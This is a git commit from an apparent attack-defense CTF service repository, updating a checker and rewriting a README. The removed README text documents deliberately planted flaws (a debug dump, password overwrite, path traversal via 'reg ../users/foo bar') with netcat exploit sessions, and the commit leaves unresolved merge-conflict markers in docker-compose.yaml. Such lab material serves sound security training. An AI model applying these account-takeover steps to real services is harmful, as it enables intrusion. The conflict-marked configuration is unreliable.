Checker repair and Readme start, will finish tomorrow.

Robert Quander · Robert Quander · commit 74a600f008f0 · 2025-08-02T11:01:54.000+02:00
diff --git a/checker/docker-compose.yaml b/checker/docker-compose.yaml
@@ -24,7 +24,10 @@ services:
       nproc:
         soft: 4000
         hard: 4000
+<<<<<<< HEAD
 
+=======
+>>>>>>> 69893c4 (Checker repair and Readme start, will finish tomorrow.)
   # The python checkerlib requires a mongo db!
   facepalm-mongo:
     image: mongo
@@ -45,4 +48,8 @@ services:
         hard: 0
       nproc:
         soft: 4000
+<<<<<<< HEAD
         hard: 4000
+=======
+        hard: 4000
+>>>>>>> 69893c4 (Checker repair and Readme start, will finish tomorrow.)
diff --git a/checker/src/checker.py b/checker/src/checker.py
@@ -82,6 +82,25 @@ async def create_post(self, text: str) -> str:
         return match.group(1)
 
     async def get_post(self, post_id: str) -> str:
+        resp = await self.client.get(f"/profile/{post_id}")
+        if resp.status_code != 200:
+            self.logger.error(f"Failed to retrieve post {post_id}, status {resp.status_code}")
+            raise MumbleException("Failed to retrieve relevant information")
+
+        try:
+            match = re.search(r'<p>DEBUG:(.*?)</p>', resp.text)
+            r = match.group(1)
+            d = html.unescape(r)
+            self.logger.debug(f"Extracted debug comment: {d}")
+            assert d, "No debug comment found in HTML"
+            return d
+        except Exception as e:
+            self.logger.error(f"Failed to extract debug comment from post {post_id}: {e}")
+            raise MumbleException("Failed to extract post content")
+
+    
+
+    async def old_get_post(self, post_id: str) -> str:
 
         resp = await self.client.get(f"/profile/{post_id}")
         if resp.status_code != 200:
diff --git a/documentation/README.md b/documentation/README.md
@@ -1,166 +1,75 @@
-Service documentation
-======================
-This is the place to keep important documentation details about your service.
+Facepalm Documentation
+===
 
-# Vulnerabilities
+## Table of Contents
 
-Please keep track of your intended vulnerabilities here:
+- [Facepalm Documentation](#facepalm-documentation)
+  - [Table of Contents](#table-of-contents)
+  - [1. Introduction](#1-introduction)
+  - [2. Architecture Overview](#2-architecture-overview)
+  - [3. Installation](#3-installation)
+    - [3.1 Clone the Repository](#31-clone-the-repository)
+    - [3.2 Running the Service](#32-running-the-service)
+    - [3.3 Running the Checker](#33-running-the-checker)
 
-## Debug enabled
 
-- Category: Misconfiguration
-- Difficulty: Easy
+## 1. Introduction
 
-When `self.debug` is set to `True`, the `dump` command will list all users and their notes. 
+Facepalm is a facebook derivative written in Swift, that lets users
+- create posts (privately or publically) containing 
+  - text
+  - images (optinional)
+- view all public posts made by others
+- create events
+- view all events
+- infos about one event
+- sign up for events
+- grant users access to an event (if they are a member (=accepted or creator of event))
 
-## Account Takeover
+An event contains a **public description** to make the event interesting to people, an optional **public image**, a **public title**, a **public date (optionally time)** and a **private location** as well as **private notes**. Private items can only be viewed when access to the event is granted.
 
-- Category: Authentication
-- Difficulty: Medium
+## 2. Architecture Overview
 
-When registering a new user, the service does not check if the user already exists and simply overwrites the password (`self.users[reg_user] = reg_pw`). The list of existing users can be obtained with the `user` command.
+Facepalm consists of two main components:
+- The service: It provides the core functionality and is everything the players will directly interact with
+- The checker: It interacts with the service by
+  - submitting flags
+  - verifying the percistence of the submitted flags
+  - Ensures the expected behaviour and avalablitly of the service
 
-## Arbitrary Read or Write (Account Takeover v2)
+## 3. Installation
 
-- Category: Path traversal
-- Difficulty: Medium
+Here, we give a quick overview of how to get, set up and run both facepalm itself as well as the checker to interact with it.
 
-The `FilesystemDict` uses user-supplied input when constructing the file paths. This could be used to write JSON-encoded data to any files. 
+As a prerequisite, only docker needs to be installed and running. All Commands for Linux/Mac.
 
-The impact has to be further analyzed. It at least leads to another account takeover (overwrite the password for other users, i.e. using `reg ../users/foo bar`).
+### 3.1 Clone the Repository
 
-*Note:* Without a proper impact analysis, we would classify this issue as a `unintended` vulnerability. Please try to keep such issues to a minimum and document them nonetheless.
+First, the Repo needs to be cloned:
 
-# Exploits
-
-For each vulnerability, you should have a working example exploit ready! 
-
-## Debug enabled:
-
-Connect to the service and run `dump`:
+```bash
+git clone https://github.com/enowars/enowars9-service-facepalm.git
 
+cd enowars9-service-facepalm
 ```
-gehaxelt@LagTop ~> nc 192.168.2.112 2323
-Welcome to the 1337 n0t3b00k!
-> dump
-Users:
-test:test
-foo:bar
-     Note 0:acbd18db4cc2f85cedef654fccc4a4d8:foo
-     Note 1:37b51d194a7513e45b56f6524f2d51f2:bar
-     Note 2:acbd18db4cc2f85cedef654fccc4a4d8:foo
-4FOBMO10HWLC:EDPWN79U2KNL
-I4K3P0SK3PST:CK5FALD39Y0S
-B70YKMW72KUR:79Y5IM7FD7O8
-GB7QC0DKYXPS:89TY8HI6OCBA
-NXPTITQUSN2M:WYIWSGRZNKTX
-6699DPYPAQDL:7IFEPP3P3LBI
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-MPG81XWFHNE8:H8KP8VECBQOR
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-QN973IXF53HT:9BUVY6JNMGIW
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-UI2WTY7E7KC5:87SB830QHVX3
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-XXPLIXZ9ZN1Q:F88L3J4GA2LE
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-N43LU1348D19:YWT9TFCSVA2T
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-3DP6COPE6GMX:OI9437MJORZR
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-I8ZUNTWZ0Y0Q:B3AI1LN9SAAE
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-JUACZ5J3D475:5RNZ1ETOFBS6
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-KGFZNGHROLUS:05826L6X39XM
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-FV9VM13K8MGF:POUIW5CM6PY2
-     Note 0:73c94f6925fea8202b5b96dbc018ad00:ENOTESTFLAG
-XAHOKR4QD63O:VENSD82XO1XM
-     Note 0:199480a3640248d5ea679b596d91c350:SKLNAYZAG7QX65RTMW3DCZAKPS9OC0TFH6GH
-```
-
-The flags are in the output.
 
-## Account Takeover
+### 3.2 Running the Service
 
-Connect to the service and use the `user` command to obtain a list of users:
+After cloning the repository, navigate into the ``service`` directory to launch the service using docker compose.
 
-```
-gehaxelt@LagTop ~ [130]> nc 192.168.2.112 2323
-Welcome to the 1337 n0t3b00k!
-> user
-User 0: test
-User 1: foo
-User 2: 4FOBMO10HWLC
-User 3: I4K3P0SK3PST
-User 4: B70YKMW72KUR
-User 5: GB7QC0DKYXPS
-User 6: NXPTITQUSN2M
-User 7: 6699DPYPAQDL
-User 8: MPG81XWFHNE8
-User 9: QN973IXF53HT
-User 10: UI2WTY7E7KC5
-User 11: XXPLIXZ9ZN1Q
-User 12: N43LU1348D19
-User 13: 3DP6COPE6GMX
-User 14: I8ZUNTWZ0Y0Q
-User 15: JUACZ5J3D475
-User 16: KGFZNGHROLUS
-User 17: FV9VM13K8MGF
-User 18: XAHOKR4QD63O
+```bash
+cd service
+docker compose up --build -d
 ```
 
-Use the username(s) and the `reg` command to set a different password. Next, `log`in as the user, `list` their notes and obtain the flag:
+*Note: It could take some time for compilation, Swift build times are a little much sometimes*
 
-```
-> reg XAHOKR4QD63O foo
-User successfully registered
-> log XAHOKR4QD63O foo
-Successfully logged in!
-> list 
-Note 0: 199480a3640248d5ea679b596d91c350
-> get 199480a3640248d5ea679b596d91c350
-SKLNAYZAG7QX65RTMW3DCZAKPS9OC0TFH6GH
-```
-
-## Arbitrary Read or Write (Account Takeover v2)
+### 3.3 Running the Checker
 
-Connect to the service and list all users:
+In the same fashion as the service has been started, the checker can be deployed by naviating to the `checker` directory, and launching it with docker compose by
 
+```bash
+cd checker
+docker compose up --build -d
 ```
-gehaxelt@LagTop ~/C/A/e/service-example (cleanup)> nc 192.168.2.112 2323
-Welcome to the 1337 n0t3b00k!
-> users
-User 0: 0WTC89S0Y67Y
-User 1: HWG5RBYEQX3Y
-User 2: XK2UJAC7KWMB
-User 3: CF8TFV304DMO
-User 4: E9XAV2ACHRY0
-User 5: SHBSC21EC963
-User 6: AC1MSHQS7HE8
-User 7: OVTN3ZXRO7X0
-User 8: IM03X7OWDEV7
-User 9: NQST4C3ABWLD
-User 10: VS7ZY06LELHI
-User 11: WFS6JGH8DDYO
-User 12: WBAYX5MLDMIG
-User 13: H4YXGNP9D3GS
-User 14: S735UCC1O7FE
-User 15: foo
-```
-
-Use the username(s) and the `reg` command to set a new password by abusing the path traversal bug:
 
-```
-gehaxelt@LagTop ~/C/A/e/service-example (cleanup)> nc 192.168.2.112 2323
-Welcome to the 1337 n0t3b00k!
-> reg ../users/foo bar
-User successfully registered
-> log foo bar
-Successfully logged in!
-> list
-Note 0: 581f1b0f439b22d1d2c617d1e8963505
-> get 581f1b0f439b22d1d2c617d1e8963505
-ENOTESTFLAG
-```
